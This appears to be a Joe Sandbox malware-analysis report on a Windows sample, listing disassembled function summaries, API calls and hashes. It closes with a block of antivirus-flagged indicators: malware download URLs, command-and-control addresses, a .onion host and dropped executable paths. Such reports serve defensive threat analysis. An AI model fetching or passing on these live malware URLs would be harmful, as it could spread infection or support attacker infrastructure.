Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 76f9daf8555445e6aa1e5262812fa67a0605c9056a2ce631602e3b7a868c563c
Instruction ID: 1f5fc0798bfbcb0f85f380207f67178b90fe2c436493db146e515ab3a851aacc
Opcode Fuzzy Hash: 76f9daf8555445e6aa1e5262812fa67a0605c9056a2ce631602e3b7a868c563c
Instruction Fuzzy Hash: F6517B71900616CFCF21EF24C9859E9BBB6FF48324B254559EA06DB251DB30FD81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005E8B30 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005E8B67
_ValidateLocalCookies.LIBCMT ref: 005E8BF8
_ValidateLocalCookies.LIBCMT ref: 005E8C78

Strings

B2Z, xrefs: 005E8C15, 005E8C1E, 005E8C2F
csm, xrefs: 005E8C0D

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: CookiesLocalValidate
String ID: B2Z$csm
API String ID: 2268201637-192645072
Opcode ID: 4bf630307651640aa4a723ec81cfb72a84455e61e40fa6e3b761b2b77e34eb7e
Instruction ID: 9c59a0274d554fdce2239dafcff2306fd44d622bc2e8b6c747661a4965095e38
Opcode Fuzzy Hash: 4bf630307651640aa4a723ec81cfb72a84455e61e40fa6e3b761b2b77e34eb7e
Instruction Fuzzy Hash: 5941F674A00259ABCF14DF69C885AAE7FB5BF86324F148095E85C5F392DB319E01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00627A3B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB4A1677,?,?,00000000,0065445F,000000FF,?,0062799E,?,?,0062794D,?), ref: 00627A70
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00627A82
FreeLibrary.KERNEL32(00000000,?,?,00000000,0065445F,000000FF,?,0062799E,?,?,0062794D,?), ref: 00627AA4

Strings

CorExitProcess, xrefs: 00627A7A
mscoree.dll, xrefs: 00627A69

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: debaf6a61b32c75682092f865ee70bf0ea9ca92eff9210165849f45b9205a197
Instruction ID: f8f7c679f5bd2f3eb223e4a9011724a03d662c25fbd0d10ec24cb344f99c9a18
Opcode Fuzzy Hash: debaf6a61b32c75682092f865ee70bf0ea9ca92eff9210165849f45b9205a197
Instruction Fuzzy Hash: 6001A2B1A44A2AFFDB119F44DC05FAEBBFAFB04B25F004625F811A3290DB759A44CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0062E521 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0062E4BD), ref: 0062E530
GetLastError.KERNEL32(?,0062E4BD), ref: 0062E53A
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 0062E578

Strings

api-ms-, xrefs: 0062E547
ext-ms-, xrefs: 0062E55D

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 5d279911f497aaa387c6f862f3da3fc2c77f8248572428462df22f6a0df0816d
Instruction ID: e04ada06c68b8ced947e4dfbc811b42385b20b1e7cd11ef1498c0d9b04c2f300
Opcode Fuzzy Hash: 5d279911f497aaa387c6f862f3da3fc2c77f8248572428462df22f6a0df0816d
Instruction Fuzzy Hash: D6F08270690605BBEB101BA1EC0AF583E1BAF41B84F184130FD4CB51E1FB73EA91C944

Uniqueness

Uniqueness Score: -1.00%

Function 00634998 Relevance: 7.8, APIs: 5, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a21e2b5a0d36bf31ad3b7909abdae6eb39fcaeb66e826bc505c14ff6d32ba2e
Instruction ID: f4969994d156ffe60de81001afb01091e34a9cbab3937521d18c929caa185124
Opcode Fuzzy Hash: 1a21e2b5a0d36bf31ad3b7909abdae6eb39fcaeb66e826bc505c14ff6d32ba2e
Instruction Fuzzy Hash: 1EB1F474E0420A9FDB11DF99D884BADFBB6BF86300F145158E441AB392DB75ED42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 005F370B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,005F351D), ref: 005F3718
GetLastError.KERNEL32(?,005F351D), ref: 005F3722
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 005F374A

Strings

api-ms-, xrefs: 005F372F

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 51bc0c5bc09ddffc4cad723b9eb24beb6581e30e2e051a9cb7f446cd6fe7ebc4
Instruction ID: 1249c2192727babdef27ecbf5e92dd8389b436c35c13d729a3447b22b313faad
Opcode Fuzzy Hash: 51bc0c5bc09ddffc4cad723b9eb24beb6581e30e2e051a9cb7f446cd6fe7ebc4
Instruction Fuzzy Hash: 67E012B068120ABEEB142B61DC06B683F5AFB41B54F148020FA0CA50E1EB75AA55DA84

Uniqueness

Uniqueness Score: -1.00%

Function 00631FA9 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(AB4A1677), ref: 0063200C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00632267
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006322AF
GetLastError.KERNEL32 ref: 00632352

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3f722ef9da561854fcc42825a6c131c91092444f8ac2c148546cdeccd2d8e398
Instruction ID: 40f9aded914a770f1b91e7b1c0a9d065a6c6af7e83ccebff61b27fabaaea64e1
Opcode Fuzzy Hash: 3f722ef9da561854fcc42825a6c131c91092444f8ac2c148546cdeccd2d8e398
Instruction Fuzzy Hash: F1D179B5D002599FDF15CFA8D890AEDBBB6FF49300F28416AE856E7351D730A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0063D5DA Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0063D5E2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063D61A
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0063D63A

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 7d6c540b03f413f04435dab649a423118a90f700f947aef4ec83e2934fd87b35
Instruction ID: f28b5e92f65329e5224e976774483e3c8fa6c1fefead7c55120d76c6c4a58399
Opcode Fuzzy Hash: 7d6c540b03f413f04435dab649a423118a90f700f947aef4ec83e2934fd87b35
Instruction Fuzzy Hash: AB11E1F19115077EAB112BB67C8ECAF6DAEEE9A398F140414F51593101FE608E0281F9

Uniqueness

Uniqueness Score: -1.00%

Function 006351EE Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00635204
GetLastError.KERNEL32(?,?,?,?), ref: 00635211
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00635237
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0063525D

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 630908c1af1865002ec393b7b0bc9a31c30a4c7fb1fe315b1ed2617aa926dee0
Instruction ID: 3b15b6e01e6c6ccbef246aaa187c1f0b2f6138056a7f8b66b1ca204f5e91621f
Opcode Fuzzy Hash: 630908c1af1865002ec393b7b0bc9a31c30a4c7fb1fe315b1ed2617aa926dee0
Instruction Fuzzy Hash: 4C113371901119AFCF209FA8DC489DF7F6AEB05760F104254F825A72A1CB31CA81DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0064C707 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0064C721
GetLastError.KERNEL32 ref: 0064C72D
___initconout.LIBCMT ref: 0064C73D

Part of subcall function 0064C7BB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0064C742), ref: 0064C7CE

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0064C751

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: a85e0a0d127efbe3507558356c80ea52922862850579a0687c3168d5f1ac445b
Instruction ID: d0656f04748a090d04de9b32f8ff80cea0aec156735e869ba8b284873139bced
Opcode Fuzzy Hash: a85e0a0d127efbe3507558356c80ea52922862850579a0687c3168d5f1ac445b
Instruction Fuzzy Hash: B1F05E36100601ABCB221B95EC08E467FABEBC93207144929F6A983631CB3198A1DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0064C823 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0064C83A
GetLastError.KERNEL32 ref: 0064C846
___initconout.LIBCMT ref: 0064C856

Part of subcall function 0064C7BB: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0064C742), ref: 0064C7CE

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 0064C86B

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: ab342d38ad20fa239bda855774f1ab3d981e4b3a31b7eb3922c18497daa5417a
Instruction ID: d04ba550c3b104e6baac0b983e1acadccf474789f176a203428bd1bcfa3d68aa
Opcode Fuzzy Hash: ab342d38ad20fa239bda855774f1ab3d981e4b3a31b7eb3922c18497daa5417a
Instruction Fuzzy Hash: D5F01276101115BFCF522FD5DC0998A3F67FB093B0B044520FA5886230DA31C9A0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0062EB09 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

InitializeCriticalSectionEx, xrefs: 0062EB69
GetXStateFeaturesMask, xrefs: 0062EB19

Memory Dump Source

Source File: 00000009.00000002.2649750400.00000000005B0000.00000020.00000001.01000000.00000008.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000009.00000002.2649718372.00000000005A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005A1000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.00000000005AC000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2649750400.0000000000650000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.0000000000671000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.000000000069F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650077191.00000000006A7000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650278199.00000000006B3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006B8000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2650322875.00000000006BB000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5a0000_A079.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: f254dc8737732858ead3fa06edf86a5d70b7818eeac9578b02cd9e9914d25ba6
Instruction ID: 0b000a9d5db7a56058d0c19ca1d7316d392de31f6074b9fbcdef24a4df573225
Opcode Fuzzy Hash: f254dc8737732858ead3fa06edf86a5d70b7818eeac9578b02cd9e9914d25ba6
Instruction Fuzzy Hash: 6901843158162877CB213FA5EC19E9E7F57EB50B62F058031FD0D2626186B24D619AD1

Uniqueness

Uniqueness Score: -1.00%

Source: http://zexeq.com/files/1/build3.exe$run	URL Reputation: Label: malware
Source: http://colisumy.com/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: http://95.214.27.254/getfile/winlog.exe	Avira URL Cloud: Label: malware
Source: http://tonimiuyaytre.org/	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.php399001	Avira URL Cloud: Label: malware
Source: http://tyiuiunuewqy.org/	Avira URL Cloud: Label: malware
Source: http://zexeq.com/files/1/build3.exe$run1Y	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.phpy	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.php	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.phpa	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.phpS	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.phpW	Avira URL Cloud: Label: malware
Source: http://zexeq.com/raud/get.php?pid=903E7F261711F85395E5CEFBF4173C54	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.phpO	Avira URL Cloud: Label: malware
Source: http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion	Avira URL Cloud: Label: malware
Source: http://79.137.192.18/9bDc8sQ/index.php398001	Avira URL Cloud: Label: malware
Source: http://liuliuoumumy.org/	Avira URL Cloud: Label: malware
Source: https://hoffmanlevi.space/385119/setup.exe	Avira URL Cloud: Label: malware
Source: http://95.214.27.254/getfile/taskhost.exee	Avira URL Cloud: Label: malware
Source: http://95.214.27.254/getfile/taskhost.exei	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\2899.exe	Avira: detection malicious, Label: HEUR/AGEN.1303617
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\Temp\A9E0.dll	Avira: detection malicious, Label: HEUR/AGEN.1300750
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312455
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Avira: detection malicious, Label: HEUR/AGEN.1303828
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Avira: detection malicious, Label: TR/AD.Nekark.gdaph
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
